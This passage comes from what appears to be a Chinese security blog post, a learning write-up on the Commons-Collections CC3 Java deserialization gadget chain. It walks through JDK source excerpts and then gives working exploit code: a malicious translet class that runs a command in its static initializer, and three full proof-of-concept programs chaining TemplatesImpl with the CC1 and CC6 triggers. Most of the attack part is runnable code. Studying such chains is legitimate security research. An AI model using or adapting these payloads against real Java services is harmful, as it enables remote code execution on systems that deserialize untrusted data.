- \n
- jdk8u71\u4ee5\u524d<\/li>\n
- Commons-Collections <= 3.2.1<\/li>\n<\/ul>\n
TemplatesImpl\u7c7b\uff1a<\/h3>\n
\u5148\u770b\u5165\u53e3\uff1a<\/p>\n
\u7c7b\u52a0\u8f7d\u5668\u7684
defineClass()<\/code>\u672c\u6765\u662fprotected<\/code>\u7c7b\u578b\uff0c\u4e14\u77e5\u8bc6\u52a0\u8f7d\u7c7b\uff0c\u4e0d\u6267\u884c\u7c7b\u3002\u8981\u989d\u5916\u5b9e\u4f8b\u5316\uff0c\u4f46\u8fd9\u91cc\u6211\u4eec\u770b\u5230\u4e86\u4e00\u4e2a\u65b9\u6cd5\u5bf9\u8fdb\u884c\u91cd\u5199\uff1a<\/p>\n![\"\"](\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\")
<\/div><\/p>\n\u00a0\u00a0\u00a0\u00a0static final class TransletClassLoader extends ClassLoader {\n\n private final Map<String,Class> _loadedExternalExtensionFunctions;\n\n TransletClassLoader(ClassLoader parent) {\n super(parent);\n _loadedExternalExtensionFunctions = null;\n }\n\n TransletClassLoader(ClassLoader parent,Map<String, Class> mapEF) {\n super(parent);\n _loadedExternalExtensionFunctions = mapEF;\n }\n\n public Class<?> loadClass(String name) throws ClassNotFoundException {\n Class<?> ret = null;\n \/\/ The _loadedExternalExtensionFunctions will be empty when the\n \/\/ SecurityManager is not set and the FSP is turned off\n if (_loadedExternalExtensionFunctions != null) {\n ret = _loadedExternalExtensionFunctions.get(name);\n }\n if (ret == null) {\n ret = super.loadClass(name);\n }\n return ret;\n }\n\n \/**\n * Access to final protected superclass member from outer class.\n *\/\n Class defineClass(final byte[] b) {\n return defineClass(null, b, 0, b.length);\n }\n }<\/code><\/pre>\n\u9ed8\u8ba4\u4e3adefault\u7c7b\u578b\uff0c\u53ef\u4ee5\u5728\u7c7b\u4e2d\u88ab\u8c03\u7528\u3002\u8ddf\u8fdb\u4e00\u4e0b\u7528\u6cd5\u3002<\/p>\n
<\/div><\/p>\nprivate void defineTransletClasses()\n throws TransformerConfigurationException {\n\n if (_bytecodes == null) {\n ErrorMsg err = new ErrorMsg(ErrorMsg.NO_TRANSLET_CLASS_ERR);\n throw new TransformerConfigurationException(err.toString());\n }\n\n TransletClassLoader loader = (TransletClassLoader)\n AccessController.doPrivileged(new PrivilegedAction() {\n public Object run() {\n return new TransletClassLoader(ObjectFactory.findClassLoader(),_tfactory.getExternalExtensionsMap());\n }\n });\n\n try {\n final int classCount = _bytecodes.length;\n _class = new Class[classCount];\n\n if (classCount > 1) {\n _auxClasses = new Hashtable();\n }\n\n for (int i = 0; i < classCount; i++) {\n _class[i] = loader.defineClass(_bytecodes[i]);\n final Class superClass = _class[i].getSuperclass();\n\n \/\/ Check if this is the main class\n if (superClass.getName().equals(ABSTRACT_TRANSLET)) {\n _transletIndex = i;\n }\n else {\n _auxClasses.put(_class[i].getName(), _class[i]);\n }\n }<\/code><\/pre>\n\u4f46\u8fd9\u4e2a
defineTransletClasses()<\/code>\u5c5e\u6027\u662fprivate<\/code>\uff0c\u8fd8\u8981\u518d\u627e\u54ea\u91cc\u8c03\u7528\u4e86\u5b83\u3002<\/p>\n<\/div><\/p>\nprivate Translet getTransletInstance()\n throws TransformerConfigurationException {\n try {\n if (_name == null) return null;\n\n if (_class == null) defineTransletClasses();\n\n \/\/ The translet needs to keep a reference to all its auxiliary\n \/\/ class to prevent the GC from collecting them\n AbstractTranslet translet = (AbstractTranslet) _class[_transletIndex].newInstance();\n translet.postInitialization();\n translet.setTemplates(this);\n translet.setServicesMechnism(_useServicesMechanism);\n translet.setAllowedProtocols(_accessExternalStylesheet);\n if (_auxClasses != null) {\n translet.setAuxiliaryClasses(_auxClasses);\n }\n\n return translet;\n }\n catch (InstantiationException e) {\n ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);\n throw new TransformerConfigurationException(err.toString());\n }\n catch (IllegalAccessException e) {\n ErrorMsg err = new ErrorMsg(ErrorMsg.TRANSLET_OBJECT_ERR, _name);\n throw new TransformerConfigurationException(err.toString());\n }<\/code><\/pre>\n\u5c31\u5728\u5b83\u4e0b\u9762\u7684
getTransletInstance()<\/code>\u51fa\u73b0\u4e86\u5bf9\u5b83\u7684\u8c03\u7528\u3002\u6211\u4eec\u518d\u627e\u8c01\u8c03\u7528\u7684\u5b83\u3002<\/p>\n<\/div><\/p>\n\u8fd9\u4e2a
newTransformer<\/code>\u5c31\u6709\u8c03\u7528\uff0c\u800c\u4e14\u8fd8\u662fpublic<\/code>\u65b9\u6cd5\u3002<\/p>\npublic synchronized Transformer newTransformer()\n throws TransformerConfigurationException\n {\n TransformerImpl transformer;\n\n transformer = new TransformerImpl(getTransletInstance(), _outputProperties,\n _indentNumber, _tfactory);\n\n if (_uriResolver != null) {\n transformer.setURIResolver(_uriResolver);\n }\n\n if (_tfactory.getFeature(XMLConstants.FEATURE_SECURE_PROCESSING)) {\n transformer.setSecureProcessing(true);\n }\n return transformer;\n }<\/code><\/pre>\n\u90a3\u4e48\u94fe\u5b50\u5230\u8fd9\u91cc\u5c31\u5df2\u7ecf\u53ef\u4ee5\u76f4\u63a5\u8c03\u7528
newTransformer<\/code>\u6253poc\u4e86\uff0c\u4e0d\u8fc7\u6211\u4eec\u7ee7\u7eed\u627e\u600e\u4e48\u89e6\u53d1\u8fd9\u4e2anewTransformer<\/code>\u3002<\/p>\nTrAXFilter\u7c7b\uff1a<\/h3>\n
\u6211\u4eec\u770b
TrAXFilter<\/code>\u7c7b\u7684\u6784\u9020\u65b9\u6cd5\uff1a<\/p>\npublic TrAXFilter(Templates templates) throws\n TransformerConfigurationException\n {\n _templates = templates;\n _transformer = (TransformerImpl) templates.newTransformer();\n _transformerHandler = new TransformerHandlerImpl(_transformer);\n _useServicesMechanism = _transformer.useServicesMechnism();\n }<\/code><\/pre>\n<\/div><\/p>\n\u53ef\u4ee5\u53d1\u73b0\u6709\u5bf9\u4f20\u5165\u53c2\u6570\u7684
newTransformer()<\/code>\u65b9\u6cd5\u7684\u8c03\u7528\u3002\u53ef\u63a7\u3002\u90a3\u4e48\u6211\u4eec\u7ee7\u7eed\u8ddf\u8fdb\u3002<\/p>\nInstantiateTransformer\u7c7b\uff1a<\/h3>\n
\u8fd9\u4e2a\u7c7b\u7684
transform()<\/code>\u65b9\u6cd5\u662f\u83b7\u53d6\u4e00\u4e2a\u53c2\u6570\u7684\u6784\u9020\u65b9\u6cd5\u5e76\u8c03\u7528<\/p>\n<\/div><\/p>\npublic Object transform(Object input) {\n try {\n if (input instanceof Class == false) {\n throw new FunctorException(\n \"InstantiateTransformer: Input object was not an instanceof Class, it was a \"\n + (input == null ? \"null object\" : input.getClass().getName()));\n }\n Constructor con = ((Class) input).getConstructor(iParamTypes);\n return con.newInstance(iArgs);\n\n } catch (NoSuchMethodException ex) {\n throw new FunctorException(\"InstantiateTransformer: The constructor must exist and be public \");\n } catch (InstantiationException ex) {\n throw new FunctorException(\"InstantiateTransformer: InstantiationException\", ex);\n } catch (IllegalAccessException ex) {\n throw new FunctorException(\"InstantiateTransformer: Constructor must be public\", ex);\n } catch (InvocationTargetException ex) {\n throw new FunctorException(\"InstantiateTransformer: Constructor threw an exception\", ex);\n }\n }<\/code><\/pre>\n\u90a3\u4e48\u5269\u4e0b\u7684\u5c31\u662f\u63a5\u4e0a\u4e4b\u524dCC1\u548cCC6\u5bf9
transform()<\/code>\u65b9\u6cd5\u7684\u8c03\u7528\u4e86\u3002\u53ea\u8981\u8c03\u6574\u4e00\u4e0bchainedTransformer<\/code>\u8c03\u7528transformer()<\/code>\u65b9\u6cd5\u540e\u7684\u94fe\u5f0f\u8c03\u7528\u5c31\u597d\uff0c\u53ef\u4ee5<\/p>\n\u662f
TrAXFilter.class<\/code>\u7ed9InstantiateTransformer<\/code>\u83b7\u53d6\u6784\u9020\u65b9\u6cd5\uff0c\u4e5f\u53ef\u4ee5\u662f\u76f4\u63a5\u628atemplates<\/code>\u62ff\u7ed9InvokerTransformer<\/code>\u8c03\u7528newTransformer()<\/code>\u65b9\u6cd5\u3002<\/p>\n\u4e0d\u8fc7\u6211\u4eec\u5728\u7ec6\u8282\u4e0a\u8fd8\u6709\u4e00\u70b9\u7ec6\u8282\u8981\u6ce8\u610f\u3002<\/p>\n
getTransletInstance()\u65b9\u6cd5\u4e2d\u53c2\u6570\u8981\u6c42\uff1a<\/h3>\n
<\/div><\/p>\n\u6211\u4eec\u770b\u8fd9\u91cc\uff0c\u8981\u6c42
_name<\/code>\u4e0d\u4e3anull<\/code>\uff0c_class<\/code>\u4e3anull<\/code>\u3002\u8fd9\u4e24\u4e2a\u90fd\u662f\u79c1\u6709\u503c\uff0c\u800c\u4e14\u90fd\u6ca1\u6709\u8d4b\u521d\u503c\uff0c\u6211\u4eec\u901a\u8fc7\u53cd\u5c04\u7ed9_name<\/code>\u968f\u4fbf\u8bbe\u5b9a\u4e00\u4e0b\u5c31\u53ef\u4ee5\u3002<\/p>\ndefineTransletClasses()\u65b9\u6cd5\u8981\u6c42\uff1a<\/h3>\n
<\/div><\/p>\n\u9996\u5148\u662f\u8fd9\u4e2a
_tfactory<\/code>\u3002\u4f1a\u8c03\u7528\u5b83\u7684getExternalExtensionsMap()<\/code>\u65b9\u6cd5\uff0c\u8fd9\u4e2a\u65b9\u6cd5\u5c5e\u4e8eTransformerFactoryImpl()<\/code>\u7c7b\uff0c\u6211\u4eec\u9700\u8981\u901a\u8fc7\u53cd\u5c04\u5c06\u5b83\u8bbe\u5b9a\u4e3a\u4e00\u4e2aTransformerFactoryImpl()<\/code>\u7c7b\u7684\u5bf9\u8c61\u3002\u540c\u65f6\u770b\u5176\u4ed6\u5e08\u5085\u7684\u535a\u5ba2\u770b\u5230\uff0c\u6211\u4eec\u62ff\u53bb\u52a0\u8f7d\u7684\u5b57\u8282\u7801\u5fc5\u987b\u662fTranslet<\/code>\u7684\u5b50\u7c7b\uff0c\u8981\u7ee7\u627fcom.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet<\/code>\u62bd\u8c61\u7c7b\uff0c\u5b9e\u73b0\u6240\u6709\u5b83\u7684\u62bd\u8c61\u65b9\u6cd5\u3002<\/p>\n\u6784\u9020\u7684\u6076\u610f\u7c7b\uff1a<\/p>\n
package org.example;\n\nimport com.sun.org.apache.xalan.internal.xsltc.DOM;\nimport com.sun.org.apache.xalan.internal.xsltc.TransletException;\nimport com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;\nimport com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;\nimport com.sun.org.apache.xml.internal.serializer.SerializationHandler;\n\nimport java.io.IOException;\n\npublic class URLClassLoader_test extends AbstractTranslet {\n static {\n try {\n Runtime.getRuntime().exec(\"calc\");\n } catch (IOException e) {\n throw new RuntimeException(e);\n }\n }\n @Override\n public void transform(DOM document, SerializationHandler[] handlers) throws TransletException {\n\n }\n\n @Override\n public void transform(DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException {\n\n }\n}<\/code><\/pre>\nPOC:<\/h3>\n
\u63a5CC1\uff0c
TrAXFilter.class<\/code>\u7ed9InstantiateTransformer<\/code>\u83b7\u53d6\u6784\u9020\u65b9\u6cd5:<\/p>\npackage POC.CC3;\n\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InstantiateTransformer;\nimport org.apache.commons.collections.map.TransformedMap;\n\nimport javax.xml.transform.Templates;\nimport java.io.*;\nimport java.lang.annotation.Target;\nimport java.lang.reflect.Constructor;\nimport java.lang.reflect.Field;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class CC3 {\n public static void main(String[] args) throws Exception {\n TemplatesImpl templates = new TemplatesImpl();\n\n \/\/\u53cd\u5c04\u6539\u53d8\u7c7b\u7684\u5c5e\u6027_name\n setFieldValue(templates,\"_name\",\"a\");\n\n \/\/\u53cd\u5c04\u6539\u53d8\u7c7b\u7684\u5c5e\u6027_bytecodes\n byte[] code = Files.readAllBytes(Paths.get(\"E:\\java\\JavaSec\\CC1\\target\\classes\\POC\\CC3\\POC.class\"));\n byte[][] codes = {code};\n setFieldValue(templates,\"_bytecodes\",codes);\n\n \/\/\u53cd\u5c04\u6539\u53d8\u7c7b\u7684\u5c5e\u6027_tfactoury\n setFieldValue(templates,\"_tfactory\",new TransformerFactoryImpl());\n\/\/ templates.newTransformer();\n\n\/\/ instantiateTransformer.transform(TrAXFilter.class);\n Transformer[] transformers = new Transformer[]{\n new ConstantTransformer(TrAXFilter.class),\n new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})\n };\n ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);\n\n \/\/Map\u7c7b\u7684\u6784\u5efa\u548c\u4fee\u9970\n HashMap<Object, Object> map = new HashMap<>();\n map.put(\"value\",\"aaa\");\n Map<Object,Object> transformermap = TransformedMap.decorate(map,null,chainedTransformer);\n\n \/\/\u904d\u5386Map\uff0c\u89e6\u53d1\u94fe\u5b50\n Class A = Class.forName(\"sun.reflect.annotation.AnnotationInvocationHandler\");\n Constructor constructor = A.getDeclaredConstructor(Class.class, Map.class);\n constructor.setAccessible(true);\n Object o = constructor.newInstance(Target.class,transformermap);\n serialize(o);\n unserialize(\"CC3.txt\");\n }\n public static void setFieldValue(Object object, String field_name, Object field_value) throws NoSuchFieldException, IllegalAccessException{\n Class c = object.getClass();\n Field field = c.getDeclaredField(field_name);\n field.setAccessible(true);\n field.set(object, field_value);\n }\n \/\/\u5b9a\u4e49\u5e8f\u5217\u5316\u64cd\u4f5c\n public static void serialize(Object object) throws IOException {\n ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(\"CC3.txt\"));\n oos.writeObject(object);\n oos.close();\n }\n\n \/\/\u5b9a\u4e49\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\n public static void unserialize(String filename) throws IOException, ClassNotFoundException{\n ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));\n ois.readObject();\n }\n}\n<\/code><\/pre>\n\u63a5CC1\uff0c\u628a
templates<\/code>\u62ff\u7ed9InvokerTransformer<\/code>\u8c03\u7528newTransformer()<\/code>\u65b9\u6cd5\uff1a<\/p>\npackage POC.CC3;\n\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.map.TransformedMap;\n\nimport java.io.*;\nimport java.lang.annotation.Target;\nimport java.lang.reflect.Constructor;\nimport java.lang.reflect.Field;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class CC3 {\n public static void main(String[] args) throws Exception {\n TemplatesImpl templates = new TemplatesImpl();\n\n \/\/\u53cd\u5c04\u6539\u53d8\u7c7b\u7684\u5c5e\u6027_name\n setFieldValue(templates,\"_name\",\"a\");\n\n \/\/\u53cd\u5c04\u6539\u53d8\u7c7b\u7684\u5c5e\u6027_bytecodes\n byte[] code = Files.readAllBytes(Paths.get(\"E:\\java\\JavaSec\\CC1\\target\\classes\\POC\\CC3\\POC.class\"));\n byte[][] codes = {code};\n setFieldValue(templates,\"_bytecodes\",codes);\n\n \/\/\u53cd\u5c04\u6539\u53d8\u7c7b\u7684\u5c5e\u6027_tfactoury\n setFieldValue(templates,\"_tfactory\",new TransformerFactoryImpl());\n\/\/ templates.newTransformer();\n\n Transformer[] transformers = new Transformer[]{\n new ConstantTransformer(templates),\n new InvokerTransformer(\"newTransformer\",null,null)\n };\n ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);\n\n \/\/Map\u7c7b\u7684\u6784\u5efa\u4e0e\u4fee\u9970\n HashMap<Object,Object> map = new HashMap<>();\n map.put(\"value\",\"aaa\");\n Map outmap = TransformedMap.decorate(map,null,chainedTransformer);\n\n \/\/\u904d\u5386map\uff0c\u89e6\u53d1\u94fe\u5b50\n Class handler = Class.forName(\"sun.reflect.annotation.AnnotationInvocationHandler\");\n Constructor constructorhandler = handler.getDeclaredConstructor(Class.class, Map.class);\n constructorhandler.setAccessible(true);\n Object obj = constructorhandler.newInstance(Target.class,outmap);\n serialize(obj);\n unserialize(\"CC3.txt\");\n }\n public static void setFieldValue(Object object, String field_name, Object field_value) throws NoSuchFieldException, IllegalAccessException{\n Class c = object.getClass();\n Field field = c.getDeclaredField(field_name);\n field.setAccessible(true);\n field.set(object, field_value);\n }\n \/\/\u5b9a\u4e49\u5e8f\u5217\u5316\u64cd\u4f5c\n public static void serialize(Object object) throws IOException {\n ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(\"CC3.txt\"));\n oos.writeObject(object);\n oos.close();\n }\n\n \/\/\u5b9a\u4e49\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\n public static void unserialize(String filename) throws IOException, ClassNotFoundException{\n ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));\n ois.readObject();\n }\n}\n<\/code><\/pre>\n\u63a5CC6\uff1a<\/p>\n
package CC3;\n\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;\nimport com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InstantiateTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\nimport org.apache.commons.collections.map.LazyMap;\n\nimport javax.xml.transform.Templates;\nimport javax.xml.transform.TransformerConfigurationException;\nimport java.io.*;\nimport java.lang.reflect.*;\nimport java.nio.file.Files;\nimport java.nio.file.Paths;\nimport java.util.HashMap;\nimport java.util.Map;\n\npublic class CC3 {\n public static void main(String[] args) throws Exception {\n TemplatesImpl templates = new TemplatesImpl();\n setFieldValue(templates,\"_name\",\"a\");\n\n byte[] code = Files.readAllBytes(Paths.get(\"E:\\java\\JavaSec\\CC1\\target\\classes\\CC3\\URLClassLoader_test.class\"));\n byte[][] codes = {code};\n setFieldValue(templates,\"_bytecodes\",codes);\n\n setFieldValue(templates,\"_tfactory\",new TransformerFactoryImpl());\n\/\/ templates.newTransformer();\n\n InstantiateTransformer instantiateTransformer = new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates});\n\/\/ instantiateTransformer.transform(TrAXFilter.class);\n Transformer[] transformers = new Transformer[] {\n new ConstantTransformer(TrAXFilter.class),\n new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates})\n };\n ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);\n Map<Object,Object> lazyMap = LazyMap.decorate(new HashMap<>(),new ConstantTransformer(\"1\"));\n\n TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap,\"2\");\n HashMap<Object,Object> hashmap = new HashMap<>();\n hashmap.put(tiedMapEntry, \"3\");\n lazyMap.remove(\"2\");\n\n \/\/\u53cd\u5c04\u4fee\u6539\u503c\n Class<LazyMap> lazyMapClass = LazyMap.class;\n Field factory = lazyMapClass.getDeclaredField(\"factory\");\n factory.setAccessible(true);\n factory.set(lazyMap, chainedTransformer);\n\n serialize(hashmap);\n unserialize(\"CC3.txt\");\n }\n public static void setFieldValue(Object object, String field_name, Object field_value) throws NoSuchFieldException, IllegalAccessException{\n Class c = object.getClass();\n Field field = c.getDeclaredField(field_name);\n field.setAccessible(true);\n field.set(object, field_value);\n }\n \/\/\u5b9a\u4e49\u5e8f\u5217\u5316\u64cd\u4f5c\n public static void serialize(Object object) throws IOException{\n ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(\"CC3.txt\"));\n oos.writeObject(object);\n oos.close();\n }\n\n \/\/\u5b9a\u4e49\u53cd\u5e8f\u5217\u5316\u64cd\u4f5c\n public static void unserialize(String filename) throws IOException, ClassNotFoundException{\n ObjectInputStream ois = new ObjectInputStream(new FileInputStream(filename));\n ois.readObject();\n }\n}\n<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"CC3\uff1a \u8fd9\u4e2a\u94fe\u5b50\u4e3b\u8981\u662f\u7528\u4e8eRuntime\u7c7b\u7528\u4e0d\u4e86\u7684\u65f6\u5019\uff0c\u539f\u7406\u5c31\u662f\u7528\u7c7b\u4f3c\u7c7b\u52a0\u8f7d\u5668\u7684\u65b9\u6cd5\u4ece\u5b57\u8282\u4e2d\u521b\u7acb\u4e00\u4e2a\u6076\u610f\u5bf9\u8c61 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[12,3],"tags":[],"class_list":["post-191","post","type-post","status-publish","format-standard","hentry","category-java","category-3"],"_links":{"self":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/191","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/comments?post=191"}],"version-history":[{"count":1,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/191\/revisions"}],"predecessor-version":[{"id":200,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/posts\/191\/revisions\/200"}],"wp:attachment":[{"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/media?parent=191"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/categories?post=191"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/arknight.wiki\/index.php\/wp-json\/wp\/v2\/tags?post=191"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
![\"\"](\"https:\/\/arknight.wiki\/wp-content\/uploads\/2026\/03\/c62f5710-2f3d-4a75-b114-9d9210fdc2b5.png\")
<\/div><\/p>\n![\"\"](\"https:\/\/arknight.wiki\/wp-content\/uploads\/2026\/03\/76f7840d-0d60-40e3-bfc1-3d137c704b4f.png\")
<\/div><\/p>\n![\"\"](\"https:\/\/arknight.wiki\/wp-content\/uploads\/2026\/03\/165469c1-8fc7-47ef-9fee-63d63ec67755.png\")
<\/div><\/p>\n![\"\"](\"https:\/\/arknight.wiki\/wp-content\/uploads\/2026\/03\/30d93fe2-b2f5-4f11-a2d9-721d61a33ec8.png\")
<\/div><\/p>\n![\"\"](\"https:\/\/arknight.wiki\/wp-content\/uploads\/2026\/03\/0be87087-86a4-4bde-b651-71caed11ac1d.png\")
<\/div><\/p>\n![\"\"](\"https:\/\/arknight.wiki\/wp-content\/uploads\/2026\/03\/a4aa937f-f407-4ffd-84ec-290f435dc4ac.png\")
<\/div><\/p>\n![\"\"](\"https:\/\/arknight.wiki\/wp-content\/uploads\/2026\/03\/a1ee99ba-bf12-4e15-902c-7d4da479ae59.png\")
<\/div><\/p>\n![\"\"](\"https:\/\/arknight.wiki\/wp-content\/uploads\/2026\/03\/b1d054b8-899f-4b5d-a084-f9753a1a5e47.png\")
<\/div><\/p>\n